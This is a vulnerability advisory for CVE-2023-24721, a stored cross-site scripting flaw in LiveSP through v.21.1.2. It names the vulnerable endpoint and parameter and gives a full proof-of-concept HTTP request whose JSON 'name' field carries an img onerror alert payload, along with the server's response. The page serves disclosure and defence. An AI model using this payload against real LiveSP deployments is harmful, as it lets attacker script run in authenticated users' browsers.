Skip to content

Latest commit

 

History

History
90 lines (73 loc) · 3.7 KB

CVE-2023-24721.md

File metadata and controls

90 lines (73 loc) · 3.7 KB

Description

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary JavaScript code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

POC

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

Affected Endpoint

  • URL: https://[ip:port]/va/service/bach/topology/element
  • HTTP Post Parameter: name

Technical Details

In this specific instance, using the API available under /va/service/bach/topology/element, it is possible to inject arbitrary JavaScript code within the name POST parameter, as shown in the following HTTP Request/Response pair.

HTTP Request:

POST /va/service/bach/topology/element HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REDACTED]
Content-Type: application/json
Content-Length: 175
Origin: [REDACTED]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\"><img src='x' onerror='alert(\"pwned\")'>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":[]}}

HTTP Response:

HTTP/1.1 201 Created
Server: [REDACTED]
Date: Wed, 04 Jan 2023 13:45:39 GMT
Content-Type: application/json
Content-Length: 902
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: [...]
Access-Control-Allow-Origin: *
Referrer-Policy: strict-origin

[...]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the https://[hostname:port]/va/cluster web page, the exploit runs from the victim’s browser.

xss

Reference